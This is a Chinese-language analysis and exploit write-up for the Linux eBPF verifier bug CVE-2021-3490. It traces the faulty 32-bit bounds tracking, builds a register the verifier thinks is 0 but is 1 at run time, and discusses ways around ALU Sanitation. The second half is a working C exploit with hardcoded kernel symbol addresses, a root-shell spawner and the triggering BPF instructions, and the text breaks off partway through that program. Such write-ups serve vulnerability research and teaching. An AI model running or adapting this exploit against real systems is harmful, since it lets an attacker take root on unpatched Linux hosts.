文章目录
前言
影响版本:Linux 5.7-rc1 ~ Linux 5.13-rc4
编译选项:CONFIG_BPF_SYSCALL
,config
所有带 BPF
字样的编译选项。General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB
。CONFIG_E1000和CONFIG_E1000E
,变更为=y。
漏洞概述:Linux内核中按位操作(AND、OR 和 XOR)的 eBPF ALU32 边界跟踪没有正确更新 32 位边界,造成 Linux 内核中的越界读取和写入,从而导致任意代码执行。三个漏洞函数分别是 scalar32_min_max_and()
、scalar32_min_max_or()
、scalar32_min_max_xor()
。
测试环境:测试环境 linux-5.11.16
漏洞分析
本文主要以 scalar32_min_max_and
漏洞函数进行分析理由,其它两个漏洞函数都是一样的其实。漏洞函数调用链如下:
bpf_check
do_check_main
do_check_common
do_check
check_alu_op
adjust_reg_min_max_vals
adjust_scalar_min_max_vals
scalar32_min_max_and
adjust_scalar_min_max_vals
函数如下:
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
struct bpf_insn *insn,
struct bpf_reg_state *dst_reg,
struct bpf_reg_state src_reg)
{
......
case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg);
scalar_min_max_and(dst_reg, &src_reg);
break;
case BPF_OR:
dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_or(dst_reg, &src_reg);
scalar_min_max_or(dst_reg, &src_reg);
break;
case BPF_XOR:
dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_xor(dst_reg, &src_reg);
scalar_min_max_xor(dst_reg, &src_reg);
break;
......
/* ALU32 ops are zero extended into 64bit register */
if (alu32)
zext_32_to_64(dst_reg);
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
return 0;
}
可以看到在执行完相应的 ALU
操作后,会执行 scalar32_min_max_XXX/scalar_min_max_XXX
函数计算 32/64 位边界,其中scalar32_min_max_and
函数如下:
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
// 当 32 位值已知时,直接返回,不作范围调整
if (src_known && dst_known)
return;
dst_reg->u32_min_value = var32_off.value;
dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);
if (dst_reg->s32_min_value < 0 || smin_val < 0) {
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
dst_reg->s32_min_value = dst_reg->u32_min_value;
dst_reg->s32_max_value = dst_reg->u32_max_value;
}
}
可以看到在 scalar32_min_max_and
函数,如果两个寄存器的低 32 位值都是 known
的就直接跳过,因为其认为在 64 位中会做相应的调整,scalar_min_max_and
函数如下:
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}
bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 1, mask = 0x100000000 }
s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002
u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002
// 当 64 位已知时,进行 mark known
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}
dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 1
dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002
if (dst_reg->smin_value < 0 || smin_val < 0) {
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
/* We may learn something more from the var_off */
__update_reg_bounds(dst_reg);
}
__mark_reg_known
函数的逻辑很简单,就是设置范围为一个常数:
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
reg->var_off = tnum_const(imm);
reg->smin_value = (s64)imm;
reg->smax_value = (s64)imm;
reg->umin_value = imm;
reg->umax_value = imm;
reg->s32_min_value = (s32)imm;
reg->s32_max_value = (s32)imm;
reg->u32_min_value = (u32)imm;
reg->u32_max_value = (u32)imm;
}
static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{
/* Clear id, off, and union(map_ptr, range) */
memset(((u8 *)reg) + sizeof(reg->type), 0,
offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));
___mark_reg_known(reg, imm);
}
如果两个寄存器 64 位都是已知的,那么其是不存在问题的,因为在 ___mark_reg_known
函数中更新了 32 位范围。但是 64 位不一定是已知的,即存在一种情况:两个寄存器的低 32 位是已知的,但是其高 32 位不确定。那么此时整个流程就忽略了对 32 位范围的更新。比如如下例子:
R6 = { .value = 1, .mask = 0xffffffff00000000 }
R8 = { .value = 0x100000002, mask = 0 }
我们模拟跟踪下 R6 & R8
执行过程中,寄存器值范围的变化:
case BPF_AND:
dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
scalar32_min_max_and(dst_reg, &src_reg);
scalar_min_max_and(dst_reg, &src_reg);
break
......
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
1 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
tnum_and
函数如下:
struct tnum tnum_and(struct tnum a, struct tnum b)
{
u64 alpha, beta, v;
// a = R6 = { value = 1, mask = 0xffffffff00000000 }
// b = R8 = { value = 0x100000002, mask = 0}
alpha = a.value | a.mask; // alpha = 0xffffffff00000001
beta = b.value | b.mask; // beta = 0x100000002
v = a.value & b.value; // v = 0
return TNUM(v, alpha & beta & ~v); // { value = 0, mask = 0x100000000 }
}
两个寄存器的初始状态如下:
R6
:
R8
:
所以执行完 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
后,dst_reg->var_off = { value = 0, mask = 0x100000000 }
,即其只有第 32 位是未知的
2 scalar32_min_max_and(dst_reg, &src_reg);
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off);
bool dst_known = tnum_subreg_is_const(dst_reg->var_off);
struct tnum var32_off = tnum_subreg(dst_reg->var_off);
s32 smin_val = src_reg->s32_min_value;
u32 umax_val = src_reg->u32_max_value;
if (src_known && dst_known)
return;
......
}
tnum_subreg_is_const
函数就是检查寄存器的低 32 位是否已知:
static inline bool tnum_subreg_is_const(struct tnum a)
{
return !(tnum_subreg(a)).mask;
}
struct tnum tnum_subreg(struct tnum a)
{
return tnum_cast(a, 4);
}
struct tnum tnum_cast(struct tnum a, u8 size)
{
a.value &= (1ULL << (size * 8)) - 1;
a.mask &= (1ULL << (size * 8)) - 1;
return a;
}
这里 dst_reg/src_reg
的低 32 位都是已知的,所以会直接返回
3 scalar_min_max_and(dst_reg, &src_reg);
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}
bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 0, mask = 0x100000000 }
s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002
u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002
// 这里 dst_reg 是未知的,所以不会执行 __mark_reg_known
if (src_known && dst_known) {
__mark_reg_known(dst_reg, dst_reg->var_off.value);
return;
}
dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 0
dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002
// 这里 dst_reg->smin_value < 0,所以会执行 if 分支
if (dst_reg->smin_value < 0 || smin_val < 0) {
dst_reg->smin_value = S64_MIN;
dst_reg->smax_value = S64_MAX;
} else {
dst_reg->smin_value = dst_reg->umin_value;
dst_reg->smax_value = dst_reg->umax_value;
}
__update_reg_bounds(dst_reg);
}
在这里 dst_reg->smin_value/smax_value
会被设置为最小值/最大值,然后执行 __update_reg_bounds(dst_reg);
:
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}
这里我们主要关注 __update_reg32_bounds(reg);
:
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);
/* min signed is max(sign bit) | min(other bits) */
// s32_min_value = max_t(s32, 1, 0) = 1
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN)); // s32_min_value = 1
/* max signed is min(sign bit) | max(other bits) */
// s32_max_value = min_t(s32, 1, 0) = 0
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX)); // s32_max_value = 0
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value); // u32_min_value = 1
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask)); // u32_max_value = 0
}
由于之前没有更新 32 位范围,所以 dst_reg
之前的 s32_min_value/s32_max_value/u32_min_value/u32_max_value
全都是一,但是经过 AND
操作后,dst_reg
的 var_off
为 { value = 0, mask = 0x100000000 }
,所以在经过 __update_reg32_bounds
处理后,你会发现 s32_min_value = u32_min_value = 1
,而 s32_max_value = u32_max_value = 0
,即寄存器 32 位范围成了 [1, 0]
,这显然是不对的。所以漏洞的本质就是:当寄存器低 32 位已知时,没有更新寄存器低 32 位范围。然后后面 3 个函数暂时先不分析。
所以经过上述操作后,此时 R6
的寄存器状态如下:
这里我们的目的还是去构造一个寄存器 vuln reg
:其验证阶段值为0,实际运行时值为1
构造 vuln reg
这里回忆一下上述构造的 R6
寄存器的状态:
R6: var_off = { .value = 0, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 0
u32_min_value = 1, u32_max_value = 0
这时我们在构造一个寄存器 R8
,其状态如下:
R8:var_off = { .value = 0, mask = 1 } real_value = 0
s32_min_value = 0, s32_max_value = 1
u32_min_value = 0, u32_max_value = 1
R6+R8
后会执行如下操作:
case BPF_ADD:
scalar32_min_max_add(dst_reg, &src_reg);
scalar_min_max_add(dst_reg, &src_reg);
dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
break;
......
__update_reg_bounds(dst_reg);
__reg_deduce_bounds(dst_reg);
__reg_bound_offset(dst_reg);
主要我们关注的是 32 位范围,所以看下 scalar32_min_max_add
函数:
static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
s32 smin_val = src_reg->s32_min_value;
s32 smax_val = src_reg->s32_max_value;
u32 umin_val = src_reg->u32_min_value;
u32 umax_val = src_reg->u32_max_value;
if (signed_add32_overflows(dst_reg->s32_min_value, smin_val) ||
signed_add32_overflows(dst_reg->s32_max_value, smax_val)) {
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
dst_reg->s32_min_value += smin_val;
dst_reg->s32_max_value += smax_val;
}
if (dst_reg->u32_min_value + umin_val < umin_val ||
dst_reg->u32_max_value + umax_val < umax_val) {
dst_reg->u32_min_value = 0;
dst_reg->u32_max_value = U32_MAX;
} else {
dst_reg->u32_min_value += umin_val;
dst_reg->u32_max_value += umax_val;
}
}
这里是不存在溢出的,所以会将对于的范围边界值相加,所以相加后其 R6
状态如下:
R6:vaf_off = { .value = 0, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
然后执行 dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
:
struct tnum tnum_add(struct tnum a, struct tnum b)
{
u64 sm, sv, sigma, chi, mu;
// { .value = 0, .mask = 0x1_0000_0000 } + { .value = 0, mask = 1 }
// sm = 0x1_0000_0001, sv = 0
sm = a.mask + b.mask;
sv = a.value + b.value;
sigma = sm + sv; // sigma = 0x1_0000_0001
chi = sigma ^ sv; // chi = 0x1_0000_0001
mu = chi | a.mask | b.mask; // mu = 0x1_0000_0001
return TNUM(sv & ~mu, mu); // { 0, 0x1_0000_0001 }
}
所以执行完 tnum_add
后 R6
的状态为:
R6:vaf_off = { .value = 0, .mask = 0x1_0000_0001 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
然后 __update_reg_bounds(dst_reg);/__reg_deduce_bounds(dst_reg);
并不会对 R6
的状态产生影响,这里读者感兴趣可以自行分析一下,比较简单。主要是 __reg_bound_offset(dst_reg);
,其会将范围反馈到寄存器的值,函数定义如下:
/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
struct tnum var64_off = tnum_intersect(reg->var_off,
tnum_range(reg->umin_value,
reg->umax_value));
struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
tnum_range(reg->u32_min_value,
reg->u32_max_value));
reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}
这里我还是只关注 32 位范围,记住此时 R6
的状态:
R6:vaf_off = { .value = 0, .mask = 0x1_0000_0001 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
我们将 struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off), tnum_range(reg->u32_min_value, reg->u32_max_value));
进行拆分:
tnum_range
函数定义如下:这里传入的 min = max = 1
struct tnum tnum_range(u64 min, u64 max)
{
u64 chi = min ^ max, delta; // min = 1, max = 1 ==> chi = 0
u8 bits = fls64(chi); // bits = 0
/* special case, needed because 1ULL << 64 is undefined */
if (bits > 63)
return tnum_unknown;
delta = (1ULL << bits) - 1; // delta = 0
return TNUM(min & ~delta, delta); // { value = 1, mask = 0 }
}
所以这里 tnum_range(reg->u32_min_value, reg->u32_max_value)); = { value = 1, mask = 0 }
tnum_subreg(reg->var_off)
就不多说了,取低 32 位,所以返回的是 { value = 0, mask = 1 }
所以最后就是:struct tnum var32_off = tnum_intersect( { value = 1, mask = 0 }, { value = 0, mask = 1 }
:
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{
u64 v, mu;
// a = { value = 1, mask = 0 }, b = { value = 0, mask = 1 }
v = a.value | b.value; // v = 1
mu = a.mask & b.mask; // mu = 0
return TNUM(v & ~mu, mu); // { 1, 0 }
}
所以最后 R6
寄存器的状态为:
R6:vaf_off = { .value = 1, .mask = 0x1_0000_0000 }
s32_min_value = 1, s32_max_value = 1
u32_min_value = 1, u32_max_value = 1
所以可以看到最后在验证阶段,R6
的低 32 位被当作了常数1(当然这里构造了 32 位,自然就构造了 64 位,比如我们只需要 AND 1
即可),但是注意 R6/R8
在实际运行时都是0,所以 R6+R8
应当是0,所以实际运行时最后 R6
应当是0(自然低 32 位应当是0)。
所以经过上述步骤,我们成功的构造了一个在验证阶段为 1
,而在实际运行时为 0
的寄存器 R6
。但是我们需要的是在验证阶段为 0
,而在实际运行时为 1
的寄存器,所以这里似乎反了。但是解决方案比较简单,我们可以先将 R6 + 1
,这样就构造了一个验证阶段为 2
,实际运行为 1
的寄存器 R6
,然后在 AND 1
,这样就成功的构造了一个验证阶段为 0
,实际运行为 1
的寄存器 R6
了
漏洞利用
构造好了验证阶段为 0
,实际运行为 1
的寄存器之后,其利用就比较常规了。但是这里需要注意 ALU Sanitation
机制。
ALU Sanitation
ALU Sanitation
是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier
静态分析的不足,这项技术通过调用 fixup_bpf_calls()
为 eBPF
程序中的每一条指令的前面都添加上额外的辅助指令来实现。
Linux v5.11.8 – 5.11.16 版本
对于 BPF_ADD
及 BPF_SUB
这样的指令而言,会添加如下辅助指令【linux-5.11.16】:
static int fixup_bpf_calls(struct bpf_verifier_env *env)
{
......
for (i = 0; i < insn_cnt; i++, insn++) {
......
if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||
insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {
const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;
const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;
struct bpf_insn insn_buf[16];
struct bpf_insn *patch = &insn_buf[0];
bool issrc, isneg;
u32 off_reg;
aux = &env->insn_aux_data[i + delta];
if (!aux->alu_state ||
aux->alu_state == BPF_ALU_NON_POINTER)
continue;
isneg = aux->alu_state & BPF_ALU_NEG_VALUE;
issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==
BPF_ALU_SANITIZE_SRC;
off_reg = issrc ? insn->src_reg : insn->dst_reg;
if (isneg)
*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
if (issrc) {
*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX,
off_reg);
insn->src_reg = BPF_REG_AX;
} else {
*patch++ = BPF_ALU64_REG(BPF_AND, off_reg,
BPF_REG_AX);
}
if (isneg)
insn->code = insn->code == code_add ?
code_sub : code_add;
*patch++ = *insn;
if (issrc && isneg)
*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
cnt = patch - insn_buf;
new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt);
if (!new_prog)
return -ENOMEM;
delta += cnt - 1;
env->prog = prog = new_prog;
insn = new_prog->insnsi + i + delta;
continue;
}
......
return 0;
}
其中 aux->alu_limit
为当前指针运算范围,初始时为 0,与指针所做的常量运算同步,对于减法而言可读范围为 (ptr - alu_limit, ptr]
(以指针最初指向的地址为 0),因此我们还需要绕过这个检查
由于我们有运行时为 1,verifier
认为是 0 的寄存器,我们可以这样调整范围:
- 构造另外一个同样是运行时值为 1、
verifier
认为是 0 的寄存器R8
- 将
R8
乘上一个不大于value size
的值(例如value size
为 0x1000,R8
便设为 0x1000) - 将指向
map
第一个元素第一个字节value[0]
的寄存器(假设为R7
)先加上 0x1000,此时alu_limit
变为 0x1000,R7
指向value[0x1000]
R7 -= R8
,由于verifier
认为R8
为 0,因此alu_limit
保持不变,但R7
实际上已经指回了value[0]
即通过如下指令即可绕过:
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),
Linux v5.11.8 之前的版本
在内核版本 5.11.8
之前 ALU Sanitation
存在一个漏洞,即 aux_alu_limit
被初始化为 0 从而导致 0-1
造成整型溢出变为一个巨大的值,在这个 commit 中才被修复,因此对于 5.11.8
之前版本的内核而言是不需要绕过该检查的
static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
u32 *ptr_limit, u8 opcode, bool off_is_neg)
{
bool mask_to_left = (opcode == BPF_ADD && off_is_neg) ||
(opcode == BPF_SUB && !off_is_neg);
u32 off;
switch (ptr_reg->type) {
case PTR_TO_STACK:
/* Indirect variable offset stack access is prohibited in
* unprivileged mode so it's not handled here.
*/
off = ptr_reg->off + ptr_reg->var_off.value;
if (mask_to_left)
*ptr_limit = MAX_BPF_STACK + off;
else
*ptr_limit = -off;
return 0;
case PTR_TO_MAP_VALUE:
if (mask_to_left) {
*ptr_limit = ptr_reg->umax_value + ptr_reg->off;
} else {
off = ptr_reg->smin_value + ptr_reg->off;
*ptr_limit = ptr_reg->map_ptr->value_size - off;
}
return 0;
default:
return -EINVAL;
}
}
......
if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||
insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {
const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;
const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;
struct bpf_insn insn_buf[16];
struct bpf_insn *patch = &insn_buf[0];
bool issrc, isneg;
u32 off_reg;
aux = &env->insn_aux_data[i + delta];
if (!aux->alu_state ||
aux->alu_state == BPF_ALU_NON_POINTER)
continue;
isneg = aux->alu_state & BPF_ALU_NEG_VALUE;
issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==
BPF_ALU_SANITIZE_SRC;
off_reg = issrc ? insn->src_reg : insn->dst_reg;
if (isneg)
*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);
*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);
*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);
......
Linux v5.11.16 之后的版本
目前最新的 ALU Sanitation
保护机制。2021年4月 ALU Sanitation
引入新的 patch—commit 7fedb63a8307,新增了两个特性。
- 一是
alu_limit
计算方法变了,不再用指针寄存器的位置来计算,而是使用offset
寄存器。例如,假设有个寄存器的无符号边界是umax_value = 1, umin_value = 0
,则计算出alu_limit = 1
,表示如果该寄存器在运行时超出边界,则指针运算不会使用该寄存器。 - 二是在
runtime
时会用立即数替换掉verifier
认定为常数的寄存器。例如,BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)
,EXPLOIT_REG
被verifier
认定为0,但运行时为1,则将该指令改为BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)
。这个补丁本来是为了防侧信道攻击,同时也阻止了CVE-2021-3490
漏洞的利用。
以下补丁可看出,如果不确定offset寄存器是否为常量,则根据其alu_limit进行检查;如果确定其为常量,则用其常量值将其操作patch为立即数指令。
bool off_is_imm = tnum_is_const(off_reg->var_off);
alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0;
isimm = aux->alu_state & BPF_ALU_IMMEDIATE;
...
if (isimm) {
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
} else {
// Patch alu_limit check instructions
....
}
这两个新特性的引入使得本文所用的攻击方法近乎完全失效,不过这并不代表我们不能完成利用,在 D^3CTF2022-d3bpf-v2 中来自 vidar-team 的 chuj 师傅展示了一个新的技巧——由于 bpf_skb_load_bytes()
会将一个 sk_buff
的数据读到栈上,因此我们可以利用运行时为 1、verifier 确信为 0 的寄存器构造一个较长的 len
参数,从而使得数据拷贝时发生栈溢出
我们或许还需要额外的办法泄露内核地址,一个可行的方式是直接造成 kernel oops
后通过 dmesg
泄露出内核信息,这个技巧对于总会设置 oops=panic
的 CTF 题并不可用,但是大部分的真实世界环境其实都不会在 soft panic 发生时直接 panic (/proc/sys/kernel/panic_on_oops == 0
),因此这个方法的可行性其实还是挺高的
exp 及效果演示
exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(2);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
/* root checker and shell poper */
void get_root_shell(void)
{
if(getuid()) {
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
sleep(2);
exit(EXIT_FAILURE);
}
puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");
system("/bin/sh");
/* to exit the process normally, instead of segmentation fault */
exit(EXIT_SUCCESS);
}
/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
static inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
union bpf_attr attr = {
.map_type = map_type,
.key_size = key_size,
.value_size = value_size,
.max_entries = max_entries,
};
return bpf(BPF_MAP_CREATE, &attr);
}
static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
};
return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.value = (uint64_t)value,
.flags = flags,
};
return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}
static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
};
return bpf(BPF_MAP_DELETE_ELEM, &attr);
}
static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{
union bpf_attr attr = {
.map_fd = map_fd,
.key = (uint64_t)key,
.next_key = (uint64_t)next_key,
};
return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};
bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
return info.btf_id;
}
int sockets[2];
int map_fd;
int expmap_fd;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
uint64_t array_map_ops = 0xffffffff82b0d040;
uint64_t init_cred = 0xffffffff8398fca0;
uint64_t init_task = 0xffffffff83824a80;
uint64_t init_nsproxy = 0xffffffff8398e9c0;
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;
struct bpf_insn prog[] = {
BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd] = bpf_map ptr1
BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0
BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0
BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fp
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8
BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 right
BPF_EXIT_INSN(), // exit
BPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptr
BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = *(uint64_t*)r9 = value_buf1[0] = 0
BPF_MOV64_IMM(BPF_REG_8, 0xffffffff), // r8 = 0xffffffff
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0xffffffff00000000
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 = r6 & r8 = r6 & 0xffffffff00000000 ==> r6 = 0
BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 1
BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1
BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0x100000000 = { value = 0x100000000, mask = 0 }
BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2), // r8 = 0x100000002 = { value = 0x100000002, maks = 0 }
BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 = 0 | [1, 0]
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0), // r8 = value_buf1[0] = 0
BPF_ALU64_IMM(BPF_AND, BPF_REG_8, 1), // r8 = r8 & 1 = 0
BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_8), // r6 = r6 + r8 = 0
